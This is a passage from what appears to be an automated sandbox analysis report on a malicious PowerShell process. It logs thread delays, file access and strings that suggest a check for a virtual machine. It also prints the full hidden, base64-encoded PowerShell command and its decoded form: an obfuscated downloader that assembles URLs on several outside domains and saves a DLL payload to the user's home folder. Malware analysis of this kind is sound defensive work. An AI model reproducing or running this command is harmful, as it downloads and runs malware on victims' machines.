Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1331Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3071Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5941Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep count: 3071 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4840Thread sleep count: 5941 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWS
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') ); SeT-iTEM ('vaR'+'IabLE'+':mBu') ( [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S'); ( vARiaBLe ("m"+"bu") -VAlueoN )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') ); SeT-iTEM ('vaR'+'IabLE'+':mBu') ( [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S'); ( vARiaBLe ("m"+"bu") -VAlueoN )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
